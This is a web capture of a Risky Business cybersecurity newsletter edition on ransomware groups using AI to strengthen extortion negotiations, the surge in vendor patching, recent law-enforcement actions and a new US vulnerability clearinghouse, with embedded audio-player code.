90%; margin: 0 auto;&quot;&gt; &lt;button type=&quot;button&quot; class=&quot;playPauseBtn&quot; style=&quot;color: #1e1e1e; background-color: #FAFAFA; font-size: 18px; border: none; padding: 10px; border-radius: 8px; cursor: pointer; height: 42px; width: 42px; text-align: center; display: flex; align-items: center; justify-content: center;&quot;&gt;&amp;#9654;&lt;/button&gt; &lt;input type=&quot;range&quot; style=&quot;flex-grow: 1; -webkit-appearance: none; height: 5px; background: #ddd; border-radius: 8px; outline: none; cursor: pointer;&quot; class=&quot;progressBar&quot; value=&quot;0&quot; min=&quot;0&quot; max=&quot;100&quot; /&gt; &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;currentTime&quot;&gt;0:00&lt;/span&gt; / &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;duration&quot;&gt; 20:23 &lt;/span&gt; &lt;/div&gt; &lt;!-- Subscribe Buttons --&gt; &lt;div style=&quot;width: 90%; display: flex; justify-content: space-between; align-items: center; padding-left: 5%;&quot;&gt; &lt;div style=&quot;padding-right:20px;&quot; class=&quot;subText&quot;&gt; &lt;strong&gt;Subscribe &amp;nbsp;&lt;/strong&gt; &lt;/div&gt; &lt;div style=&quot;display: flex; align-items: center; gap: 6px; margin: 0; flex-grow: 1;&quot; class=&quot;subContainer&quot;&gt; &lt;a href=&quot;https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970&quot; class=&quot;icon apple-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 48px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://overcast.fm/itunes1621305970&quot; class=&quot;icon overcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 141px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://pca.st/yicebxgl&quot; class=&quot;icon pocketcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 234px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q&quot; class=&quot;icon spotify-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 420px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://risky.biz/feeds/risky-business-news&quot; class=&quot;icon rss-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 327px 96px;&quot;&gt;&lt;/a&gt; &lt;/div&gt; &lt;a href=&quot;https://risky.biz&quot;&gt; &lt;img src=&quot;https://risky.biz/static/img/RB_Site_Logo.svg&quot; alt=&quot;Logo&quot; style=&quot;margin-left: 0; height: 32px; display: block; padding-right: 5%;&quot; id=&quot;logo&quot; class=&quot;logo playerLogo&quot;&gt; &lt;/a&gt; &lt;script&gt; document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); function resizeElements(player) { const logo = player.querySelector(&quot;.logo&quot;); const subscribeIcons = player.querySelectorAll(&quot;.icon&quot;); const subscribeContainer = player.querySelector(&quot;.subContainer&quot;); // Select subContainer by class const subText = player.querySelector(&quot;.subText&quot;); // Select subText by class if (player.offsetWidth &lt;= 425) { // Hide logo if (logo) { logo.style.display = &quot;none&quot;; } } else if (player.offsetWidth &lt;= 500) { // Show logo and scale logo and icons to 70% if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(0.7)&quot;; logo.style.transformOrigin = &quot;center&quot;; logo.style.verticalAlign = &quot;middle&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(0.7)&quot;; icon.style.transformOrigin = &quot;center&quot;; icon.style.verticalAlign = &quot;middle&quot;; }); // Remove padding from subText and set font-size to 12px if (subText) { subText.style.padding = &quot;0&quot;; subText.style.fontSize = &quot;12px&quot;; } // Set gap in subContainer to 0px if (subscribeContainer) { subscribeContainer.style.gap = &quot;0px&quot;; } } else { // Reset scaling, alignment, and visibility if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(1)&quot;; logo.style.verticalAlign = &quot;baseline&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(1)&quot;; icon.style.verticalAlign = &quot;baseline&quot;; }); // Reset padding and font-size in subText if (subText) { subText.style.padding = &quot;0 20px&quot;; // Default padding subText.style.fontSize = &quot;inherit&quot;; // Default font-size } // Reset gap in subContainer if (subscribeContainer) { subscribeContainer.style.gap = &quot;6px&quot;; // Default gap } } } function handleResize() { players.forEach(player =&gt; { resizeElements(player); }); } // Run on initial load and resize handleResize(); window.addEventListener(&quot;resize&quot;, handleResize); }); &lt;/script&gt; &lt;/div&gt; &lt;/div&gt; &lt;script&gt; // Custom Audio Player document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); players.forEach(function (player) { // Skip if already initialized if (player.dataset.initialized === &quot;true&quot;) return; // Mark player as initialized player.dataset.initialized = &quot;true&quot;; const audio = player.querySelector(&quot;.audioElement&quot;); const playPauseBtn = player.querySelector(&quot;.playPauseBtn&quot;); const progressBar = player.querySelector(&quot;.progressBar&quot;); const currentTimeEl = player.querySelector(&quot;.currentTime&quot;); const durationEl = player.querySelector(&quot;.duration&quot;); if (!audio || !playPauseBtn || !progressBar || !currentTimeEl || !durationEl) { console.error(&quot;One or more player elements not found:&quot;, { audio, playPauseBtn, progressBar, currentTimeEl, durationEl }); return; } playPauseBtn.addEventListener(&quot;click&quot;, () =&gt; { if (audio.paused) { audio.play(); playPauseBtn.textContent = &quot;&#x23F8;&quot;; // GA4 event for starting audio gtag(&quot;event&quot;, &quot;audio_play&quot;, { &quot;content_title&quot;: &quot;Srsly Risky Biz: Ransomware uses AI to amp up negotiations&quot;, &quot;content_type&quot;: &quot;audio&quot; }); } else { audio.pause(); playPauseBtn.textContent = &quot;&#x25B6;&quot;; } }); audio.addEventListener(&quot;timeupdate&quot;, () =&gt; { if (audio.duration) { progressBar.value = (audio.currentTime / audio.duration) * 100; currentTimeEl.textContent = formatTime(audio.currentTime); } }); audio.addEventListener(&quot;loadedmetadata&quot;, () =&gt; { durationEl.textContent = formatTime(audio.duration); }); progressBar.addEventListener(&quot;input&quot;, () =&gt; { if (audio.duration) { audio.currentTime = (progressBar.value / 100) * audio.duration; } }); function formatTime(seconds) { const minutes = Math.floor(seconds / 60); const secs = Math.floor(seconds % 60); return `${minutes}:${secs &lt; 10 ? &quot;0&quot; : &quot;&quot;}${secs}`; } }); }); &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; "></iframe> <!--kg-card-end: html--> <figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/2026/07/data-src-image-0106ab1d-8229-47e6-a23a-bb2d0635999b.jpeg" class="kg-image" alt="Srsly Risky Biz: Ransomware Uses AI To Amp Up Negotiations" loading="lazy" width="2000" height="1334" srcset="https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/size/w600/2026/07/data-src-image-0106ab1d-8229-47e6-a23a-bb2d0635999b.jpeg 600w, https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/size/w1000/2026/07/data-src-image-0106ab1d-8229-47e6-a23a-bb2d0635999b.jpeg 1000w, https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/size/w1600/2026/07/data-src-image-0106ab1d-8229-47e6-a23a-bb2d0635999b.jpeg 1600w, https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/2026/07/data-src-image-0106ab1d-8229-47e6-a23a-bb2d0635999b.jpeg 2048w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Photo by</span><a href="https://unsplash.com/@chrissabor?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText"> <u><span class="underline" style="white-space: pre-wrap;">Chris Sabor</span></u></a><span style="white-space: pre-wrap;"> on</span><a href="https://unsplash.com/photos/two-crane-fighting-while-flying-qlaot0VrqTM?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText"> <u><span class="underline" style="white-space: pre-wrap;">Unsplash</span></u></a></figcaption></figure><p>It&apos;s commonly thought that ransomware operators are simply using AI to hack more companies. However, some operators are employing AI to generate leverage so they can extract more money in negotiations with victims.&#xA0;</p><p>A leading example is FulcrumSec, a data extortion group that started operating around September 2025 and <a href="https://www.sysdig.com/blog/the-fulcrumsec-playbook-how-to-detect-and-stop-the-group-behind-the-novo-nordisk-breach"><u>uses simple techniques</u></a> to breach organisations. It typically gains access by taking advantage of hardcoded or exposed credentials, unpatched applications or misconfigured storage.&#xA0;</p><p>The group claims to have <a href="https://www.ransomware.live/group/fulcrumsec"><u>breached 25 organisations</u></a> and stolen several terabytes of data using these techniques.&#xA0;</p><p>It doesn&apos;t need AI to hack, but has been using it to analyse stolen data so it can apply more pressure to victims.</p><p>A GuidePoint Security report published <a href="https://www.guidepointsecurity.com/wp-content/uploads/2026/07/GRIT_Q2_2026_Ransomware__Cyber_Threat_Insights_Report.pdf"><u>last week</u></a> detailed FulcrumSec&apos;s use of AI to analyse stolen data and establish a firm negotiating position: &quot;We know what we have taken, here it is, and this is why we have set the ransom at this amount&quot;.&#xA0;</p><p>In June this year, FulcrumSec reached out to <em>DataBreaches[dot]Net</em> regarding its <a href="https://www.novonordisk.com/news-and-media/latest-news/incident-update.html"><u>compromise</u></a> of Danish pharmaceutical company <a href="https://en.wikipedia.org/wiki/Novo_Nordisk"><u>Novo Nordisk</u></a>, the maker of Wegovy and Semaglutide. It claimed to have stolen 1.3TB of data containing 700,717 files.&#xA0;</p><p>FulcrumSec said it had captured valuable intellectual property (IP) including five undisclosed drug programs, in-development drug and RNA delivery programs and private AI models for particular medical and drug discovery purposes.&#xA0;</p><p>The group told <em>DataBreaches </em>that it used a team of AI agents to analyse those private models and that it believes the stolen data could save competitors three to five years of program development. Its initial ransom demand to Novo Nordisk was for USD$25 million.</p><p>The information about the IP FulcrumSec stole was coupled with a description of Novo Nordisk&apos;s security posture, which the group claimed was &quot;absolutely catastrophic&quot; and &quot;boggles the mind&quot;.&#xA0;</p><p>To us, this sounds like FulcrumSec is attempting to frame the incident in a way that would have any class action lawyer salivating. It wouldn&apos;t be the first time a <a href="https://www.classaction.org/news/category/data-breach"><u>data breach has resulted in a lawsuit</u></a>, so presumably this is part of FulcrumSec&apos;s extortion pitch.&#xA0;</p><p>FulcrumSec&apos;s modus operandi also includes using AI to generate detailed reports which it then provides to threat researchers and journalists, nicely formatted, complete with logo and all, in order to apply more pressure to victims.</p><p>For example, after compromising the technology company Avnet in October last year, the group gave the vx-underground X account <a href="https://x.com/vxunderground/status/1975629199323853027"><u>a report on the breach</u></a>. According to vx-underground, the group provided &quot;an autobiography, a breakdown of the data they possess, their motives for the compromise, information on their logo design (and why their logo was chosen), a complete file listing from the compromise, a breakdown of the files (what it is, what they are, what they contain) [and] images of the files&quot;.</p><p>vx-underground said the group had done &quot;every bit of research and write up for me&quot;. To add insult to injury, FulcrumSec claimed it had used an OpenAI key it had stolen from the victim to pay for ChatGPT to summarise the victim&apos;s own data.&#xA0;&#xA0;</p><p>FulcrumSec isn&apos;t the only ransomware operation GuidePoint Security highlights as using LLMs to amp up pressure in negotiations. The security firm believes the DragonForce ransomware group, around in various forms since 2023, is using LLMs to &quot;manufacture plausible [psychological] pressure&quot;.&#xA0;</p><p>During negotiations the group has claimed to have legal counsel on staff which, GuidePoint Security says, is &quot;to pressure victims by implying that DragonForce has insight into a victim&apos;s reporting requirements and legal exposure from the data leak&quot;.&#xA0;</p><p>Both DragonForce and FulcrumSec have a verifiable track record of stealing data, being involved in extortion negotiations and sometimes actually getting paid.</p><p><strong>A contrast from previous AI hacks for extortion</strong> <strong>&#xA0;&#xA0;&#xA0;&#xA0;</strong></p><p>This is a clear contrast from earlier reports of AI-enabled hacking for extortion. Those reports described incidents disconnected from mechanisms to make money from ransomware incidents.&#xA0;</p><p>In April <a href="https://news.risky.biz/srsly-risky-biz-it-is-time-to-ban-sale-of-precise-geolocation/#ai-is-your-helpful-hacker-team"><u>we wrote about</u></a> a single hacker who breached nine <a href="https://gambit.security/blog-posts/a-single-operator-two-ai-platforms-nine-government-agencies-the-full-technical-report"><u>Mexican government agencies</u></a>. He did so within weeks with the assistance of a variety of LLMs. <a href="https://research.openanalysis.net/claude/codex/hacking/ai%20hacking/llm/redteam/policy%20violation/2026/06/16/compromised-claude-hacking.html"><u>Another</u></a> individual in Ethiopia hacked at least 14 companies in partially automated attacks.&#xA0;</p><p>In both cases the <em>hacking</em> itself was very successful, but when it came to turning that access into cash, both hackers struggled.</p><p>Similarly, early this month security firm Sysdig <a href="https://www.sysdig.com/blog/jadepuffer-agentic-ransomware-for-automated-database-extortion#what-this-means"><u>reported on</u></a> what it called JADEPUFFER, &quot;agentic ransomware: a complete extortion operation driven end-to-end by a LLM&quot;. This malware did all the hacky things very well, but the extracting-money-from-victims side of things felt a bit half-baked.&#xA0;</p><p>Take its encryption scheme, for example. It locked up victims&apos; files, but did not store or send encryption keys. Encrypted files, therefore, could never be recovered. Its ransom note also asked for payment to the example address provided in Bitcoin documentation. Finally, the email address in its ransom note does not appear in threat intelligence databases or in victim forums, which suggests it has never been used before.&#xA0;</p><p><strong>Established operators seizing AI opportunities</strong></p><p>Of course, there are some established ransomware operators taking advantage of AI-enabled hacking.&#xA0;</p><p>Last month&apos;s so-called <a href="https://www.cisa.gov/news-events/alerts/2026/06/18/cisa-urges-hardening-fortinet-devices-after-reports-credential-exposure"><u>FortiBleed campaign</u></a>, which has been linked to the INC and Lynx ransomware groups, was an <a href="https://socradar.io/wp-content/uploads/2026/07/FortiBleed-Unmasked_-A-Joint-Operation-by-Lynx-and-INC-Ransomware-Groups-.pdf"><u>AI-driven hacking operation</u></a>. In that case, credential harvesting has been used to feed data extortion campaigns.</p><p>This is the subject of a Risky Business Features interview with Technology Editor James Wilson that will be published <a href="https://risky.biz/RBFEATURES32/"><u>here</u></a> today.&#xA0;</p><p>Two ransomware industry trends are relevant here.</p><p>Data extortion is becoming the preferred business model because it is easier to carry out and quieter than encrypting ransomware. As organisation&apos;s backup strategies improve, encryption adds cost and complexity without increasing the likelihood that victims will pay up.&#xA0;</p><p>At the same time, data extortion payment rates <a href="https://coveware.com/2026/02/why-zero-day-downstream-mass-data-extortion-campaigns-are-losing-their-bite/"><u>are falling</u></a>.&#xA0;&#xA0;</p><p>The INC/Lynx strategy here is to use AI to hack <em>more often</em> to make up for less frequent paydays. FulcrumSec is taking the opposite approach and trying to maximise profits by amplifying their leverage in negotiations.&#xA0;</p><p>Our take-home message here is that nerdy, technically focused ransomware actors use AI to hack, but sophisticated ransomware actors? They use it to negotiate.&#xA0;</p><h2 id="the-bugpocalypse-is-here-officially">The Bugpocalypse Is Here, Officially</h2><p>While the cleansing blast of AI is exposing decades of insecure coding practices, the resulting vendor patch frenzy is causing headaches for organisations trying to keep up.</p><p>This month&apos;s Microsoft Patch Tuesday <a href="https://www.bleepingcomputer.com/news/microsoft/microsoft-july-2026-patch-tuesday-fixes-massive-570-flaws-3-zero-days/"><u>addressed 570 vulnerabilities</u></a>, adding to another 50-odd vulnerabilities patched by Microsoft earlier in July. That&apos;s up from 200 last month. Around 10% of the most recent bugs are rated critical.&#xA0;</p><p>In addition, Google has patched 428 non-Microsoft Chromium vulnerabilities, which will be ported to the Edge browser.&#xA0;</p><p>It&#x2019;s not just Microsoft and Google patching like crazy, either. Adobe is doubling releases and moving to a twice-monthly patch cycle. This month, to date, the vendor has patched 88 vulnerabilities.&#xA0;&#xA0;&#xA0;</p><p>The optimists among us could easily look at this as <em>good</em> news. AI is sweeping away decades of technical debt accumulated through insecure coding practices. And big platforms are not only <em>finding</em> lots of bugs, they are also pushing out lots of patches. That&apos;s got to be positive, right?</p><p>Unfortunately, here at <em>Risky Business</em> we&apos;re not known for our optimistic world view. Having a patch available is great, if it&apos;s applied. Unfortunately, the reality is that many organisations don&apos;t apply them, and never will.&#xA0;</p><p>Unpatched vulnerabilities remain a significant entry point into organisations, a fact highlighted in <a href="https://www.verizon.com/business/resources/reports/dbir/"><u>this year&apos;s Verizon Data Breach Investigations Report</u></a>.&#xA0;</p><p>And patches can be analysed by bad actors to understand the flaw and find ways to compromise any unpatched instances. And while AI helps to discover software flaws and patch them, bad actors can also use AI to <a href="https://www.akamai.com/blog/security-research/patch-wednesday-root-cause-analysis-with-llms"><u>reverse engineer patches</u></a> to generate exploits.&#xA0;</p><p>The end result of all this patching may be that cloud services and the minority of systems with sysadmins that patch like crazy are better protected, sure.&#xA0;</p><p>But for the majority that either patch slowly or don&#x2019;t even patch at all? Their systems end up being <em>less </em>secure.&#xA0;&#xA0;</p><p>While we are somewhat optimistic that big tech shops are using AI tools to write more secure code, we expect coding agents are YOLOing the <em>vast</em> majority of new code being written today, without giving a rat&apos;s ass about being secure.&#xA0;</p><p>So although an avalanche of bugs is being fixed, this patch frenzy is not going to eliminate vulnerabilities. It is just going to leave those who don&apos;t commit to proper patching processes even more exposed to threats.&#xA0;</p><p><em>Watch James Wilson and Tom Uren discuss this edition of the newsletter:</em></p><figure class="kg-card kg-embed-card"><iframe width="200" height="113" src="https://www.youtube.com/embed/xyC8ttcsKBI?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen title="Srsly Risky Biz: Ransomware uses AI to amp up negotiations"></iframe></figure><h2 id="three-reasons-to-be-cheerful-this-week">Three Reasons to Be Cheerful This Week:</h2><ol><li><strong>Global fraud bust:</strong> <a href="https://www.interpol.int/News-and-Events/News/2026/Over-5-800-arrests-USD-293-million-intercepted-in-global-fraud-bust"><u>INTERPOL has announced</u></a> that Operation First Light, an anti-fraud action involving 97 countries, has resulted in the interception of USD$293 million worth of illicit assets and the arrest of over 5,800 individuals. First Light focused on what INTERPOL described as &quot;social engineering scams and associated money laundering&quot;. It&apos;s the biggest arrest count from a single operation that we can recall!</li><li><strong>First joint EU-UK cyber sanctions:</strong> <a href="https://www.consilium.europa.eu/en/press/press-releases/2026/07/13/cyber-russia-statement-by-the-high-representative-on-behalf-of-the-european-union-denouncing-russia-s-malicious-cyber-ecosystem-targeting-the-eu-its-member-states-and-international-partners/"><u>The EU</u></a> and <a href="https://www.gov.uk/government/news/uk-and-eu-strike-russian-cyber-networks-with-new-sanctions"><u>UK have announced</u></a> sanctions targeting Russian state and criminal cyber actors. Curiously, although both announcements <a href="https://www.theregister.com/security/2026/07/13/uk-eu-officially-pin-poland-energy-cyberattack-on-russia/5270458"><u>attribute December 2025 attacks on Poland&apos;s energy grid</u></a> to the <a href="https://en.wikipedia.org/wiki/Federal_Security_Service"><u>FSB&apos;s</u></a> Centre 16, not a single FSB official was named. Instead, <a href="https://x.com/iiyonite/status/2076665205400965404?s=20"><u>the sanctions package</u></a> lists criminal actors and officials in <a href="https://en.wikipedia.org/wiki/GRU_(Russian_Federation)"><u>the GRU</u></a>, Russian military intelligence.&#xA0;&#xA0;</li><li><strong>Companies in Europe can scan for CSAM: </strong><em>The Record</em> <a href="https://therecord.media/chat-control-2-csam-scans-european-parliament-passage"><u>reports the</u></a> European parliament has revived legal protections for big tech companies such as Google, Microsoft and Meta which allowed them to scan for and report illegal Child Sexual Abuse Material (CSAM) on their services. The previous law allowing voluntary scanning had lapsed. Scanning content is contentious, but we are glad that the status quo in which scanning unencrypted material is authorised will remain until 2028.&#xA0;</li></ol><h2 id="sponsor-section">Sponsor Section</h2><p><em>In this <strong>Risky Business sponsor interview</strong>, James Wilson chats with Sondera CEO Josh Devon about why guardrails and instruction files aren&#x2019;t enough to keep AI agents from going haywire. EDR, DLP and other traditional controls can&apos;t and won&apos;t prevent agents from going rogue. Josh explains Sondera&#x2019;s &#x201C;principle of least autonomy&#x201D; for agents: let them do useful work, but put them in a deterministic policy harness so they can&#x2019;t leak secrets, abuse tools or wander off-task.</em></p> <!--kg-card-begin: html--> <iframe frameborder="0" style="width: 100%; height: 156px;" srcdoc=" &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; &lt;title&gt;Risky Business Player&lt;/title&gt; &lt;/head&gt; &lt;body&gt; &lt;!-- Include the Google Font Inter --&gt; &lt;style&gt; @import url(&quot;https://fonts.googleapis.com/css2?family=Inter:wght@400;700&amp;display=swap&quot;); body { margin: 0px; } .audio-player { font-family: &quot;Inter&quot;, sans-serif; } .icon { background-image: url(&quot;https://risky.biz/static/img/icons/subscribe-icons.svg&quot;); display: block; width: 33px; height: 33px; background-size: 528px 111px; } } &lt;/style&gt; &lt;!-- Audio player --&gt; &lt;div class=&quot;audio-player&quot; style=&quot;display: flex; flex-direction: column; gap: 5px; padding-top: 0px; padding-bottom: 20px; background: rgb(244, 244, 239); background: linear-gradient(0deg, rgba(244, 244, 239, 1) 0%, rgba(244, 244, 239, 0) 100%); border-radius: 8px; border: 1px solid #d7d7d7; width: calc(100% - 1px) min-width: 350px;&quot;&gt; &lt;audio class=&quot;audioElement&quot; preload=&quot;none&quot;&gt; &lt;source src=&quot;https://dts.podtrac.com/redirect.mp3/media3.risky.biz/RBNEWSSI129.mp3&quot; type=&quot;audio/mpeg&quot;&gt; Your browser does not support the audio element. &lt;/audio&gt; &lt;!-- Title --&gt; &lt;div style=&quot;background: #666666; color: #FEFEFE; font-size: 14px; padding-left: 5%; padding-right: 5%; padding-top: 10px; padding-bottom: 10px; border-top-left-radius: 8px; border-top-right-radius: 8px; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; margin-bottom: 10px;&quot;&gt; &lt;a style=&quot;color:#FEFEFE; text-decoration: none;&quot; target=&quot;_new&quot; href=&quot;https://risky.biz/RBNEWSSI129/&quot;&gt;Sponsored: Teaching AI agents the rules of the road&lt;/a&gt; &lt;/div&gt; &lt;!-- Player Controls and Progress Bar --&gt; &lt;div style=&quot;display: flex; align-items: center; justify-content: center; gap: 10px; width: 90%; margin: 0 auto;&quot;&gt; &lt;button type=&quot;button&quot; class=&quot;playPauseBtn&quot; style=&quot;color: #1e1e1e; background-color: #FAFAFA; font-size: 18px; border: none; padding: 10px; border-radius: 8px; cursor: pointer; height: 42px; width: 42px; text-align: center; display: flex; align-items: center; justify-content: center;&quot;&gt;&amp;#9654;&lt;/button&gt; &lt;input type=&quot;range&quot; style=&quot;flex-grow: 1; -webkit-appearance: none; height: 5px; background: #ddd; border-radius: 8px; outline: none; cursor: pointer;&quot; class=&quot;progressBar&quot; value=&quot;0&quot; min=&quot;0&quot; max=&quot;100&quot; /&gt; &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;currentTime&quot;&gt;0:00&lt;/span&gt; / &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;duration&quot;&gt; 26:54 &lt;/span&gt; &lt;/div&gt; &lt;!-- Subscribe Buttons --&gt; &lt;div style=&quot;width: 90%; display: flex; justify-content: space-between; align-items: center; padding-left: 5%;&quot;&gt; &lt;div style=&quot;padding-right:20px;&quot; class=&quot;subText&quot;&gt; &lt;strong&gt;Subscribe &amp;nbsp;&lt;/strong&gt; &lt;/div&gt; &lt;div style=&quot;display: flex; align-items: center; gap: 6px; margin: 0; flex-grow: 1;&quot; class=&quot;subContainer&quot;&gt; &lt;a href=&quot;https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970&quot; class=&quot;icon apple-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 48px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://overcast.fm/itunes1621305970&quot; class=&quot;icon overcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 141px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://pca.st/yicebxgl&quot; class=&quot;icon pocketcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 234px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q&quot; class=&quot;icon spotify-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 420px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://risky.biz/feeds/risky-business-news&quot; class=&quot;icon rss-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 327px 96px;&quot;&gt;&lt;/a&gt; &lt;/div&gt; &lt;a href=&quot;https://risky.biz&quot;&gt; &lt;img src=&quot;https://risky.biz/static/img/RB_Site_Logo.svg&quot; alt=&quot;Logo&quot; style=&quot;margin-left: 0; height: 32px; display: block; padding-right: 5%;&quot; id=&quot;logo&quot; class=&quot;logo playerLogo&quot;&gt; &lt;/a&gt; &lt;script&gt; document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); function resizeElements(player) { const logo = player.querySelector(&quot;.logo&quot;); const subscribeIcons = player.querySelectorAll(&quot;.icon&quot;); const subscribeContainer = player.querySelector(&quot;.subContainer&quot;); // Select subContainer by class const subText = player.querySelector(&quot;.subText&quot;); // Select subText by class if (player.offsetWidth &lt;= 425) { // Hide logo if (logo) { logo.style.display = &quot;none&quot;; } } else if (player.offsetWidth &lt;= 500) { // Show logo and scale logo and icons to 70% if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(0.7)&quot;; logo.style.transformOrigin = &quot;center&quot;; logo.style.verticalAlign = &quot;middle&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(0.7)&quot;; icon.style.transformOrigin = &quot;center&quot;; icon.style.verticalAlign = &quot;middle&quot;; }); // Remove padding from subText and set font-size to 12px if (subText) { subText.style.padding = &quot;0&quot;; subText.style.fontSize = &quot;12px&quot;; } // Set gap in subContainer to 0px if (subscribeContainer) { subscribeContainer.style.gap = &quot;0px&quot;; } } else { // Reset scaling, alignment, and visibility if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(1)&quot;; logo.style.verticalAlign = &quot;baseline&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(1)&quot;; icon.style.verticalAlign = &quot;baseline&quot;; }); // Reset padding and font-size in subText if (subText) { subText.style.padding = &quot;0 20px&quot;; // Default padding subText.style.fontSize = &quot;inherit&quot;; // Default font-size } // Reset gap in subContainer if (subscribeContainer) { subscribeContainer.style.gap = &quot;6px&quot;; // Default gap } } } function handleResize() { players.forEach(player =&gt; { resizeElements(player); }); } // Run on initial load and resize handleResize(); window.addEventListener(&quot;resize&quot;, handleResize); }); &lt;/script&gt; &lt;/div&gt; &lt;/div&gt; &lt;script&gt; // Custom Audio Player document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); players.forEach(function (player) { // Skip if already initialized if (player.dataset.initialized === &quot;true&quot;) return; // Mark player as initialized player.dataset.initialized = &quot;true&quot;; const audio = player.querySelector(&quot;.audioElement&quot;); const playPauseBtn = player.querySelector(&quot;.playPauseBtn&quot;); const progressBar = player.querySelector(&quot;.progressBar&quot;); const currentTimeEl = player.querySelector(&quot;.currentTime&quot;); const durationEl = player.querySelector(&quot;.duration&quot;); if (!audio || !playPauseBtn || !progressBar || !currentTimeEl || !durationEl) { console.error(&quot;One or more player elements not found:&quot;, { audio, playPauseBtn, progressBar, currentTimeEl, durationEl }); return; } playPauseBtn.addEventListener(&quot;click&quot;, () =&gt; { if (audio.paused) { audio.play(); playPauseBtn.textContent = &quot;&#x23F8;&quot;; // GA4 event for starting audio gtag(&quot;event&quot;, &quot;audio_play&quot;, { &quot;content_title&quot;: &quot;Sponsored: Teaching AI agents the rules of the road&quot;, &quot;content_type&quot;: &quot;audio&quot; }); } else { audio.pause(); playPauseBtn.textContent = &quot;&#x25B6;&quot;; } }); audio.addEventListener(&quot;timeupdate&quot;, () =&gt; { if (audio.duration) { progressBar.value = (audio.currentTime / audio.duration) * 100; currentTimeEl.textContent = formatTime(audio.currentTime); } }); audio.addEventListener(&quot;loadedmetadata&quot;, () =&gt; { durationEl.textContent = formatTime(audio.duration); }); progressBar.addEventListener(&quot;input&quot;, () =&gt; { if (audio.duration) { audio.currentTime = (progressBar.value / 100) * audio.duration; } }); function formatTime(seconds) { const minutes = Math.floor(seconds / 60); const secs = Math.floor(seconds % 60); return `${minutes}:${secs &lt; 10 ? &quot;0&quot; : &quot;&quot;}${secs}`; } }); }); &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; "></iframe> <!--kg-card-end: html--> <h2 id="shorts">Shorts</h2><h3 id="finally-a-gold-eagle-just-what-cybersecurity-needed">Finally, A Gold Eagle. Just What Cybersecurity Needed</h3><p>This week the <a href="https://www.whitehouse.gov/releases/2026/07/white-house-launches-gold-eagle-initiative-for-unprecedented-cybersecurity-vulnerability-coordination/"><u>White House announced</u></a> the launch of Gold Eagle, a new &quot;clearinghouse&quot; for cyber security vulnerability disclosure and coordination.&#xA0;</p><p>Normally, we&apos;d place this kind of news item in the reasons to be cheerful section of the newsletter, but this is just all a bit weird. The initiative is being run out of the Treasury Department and Treasury Secretary Scott Bessent gets top billing in the White House&apos;s announcement.&#xA0;</p><p>CISA, the organisation with <em>actual</em> experience in collating, assessing and disseminating vulnerability gets one mere mention in the announcement.&#xA0;</p><p>And then there&apos;s the name. Gold Eagle. Wut?&#xA0;</p><h2 id="risky-biz-talks">Risky Biz Talks</h2><p><em>You can find the audio edition of this newsletter and other fine podcasts and interviews in the Risky Biz News feed (</em><a href="https://risky.biz/feeds/risky-business-news"><em><u>RSS</u></em></a><em>, </em><a href="https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970"><em><u>iTunes</u></em></a><em> or </em><a 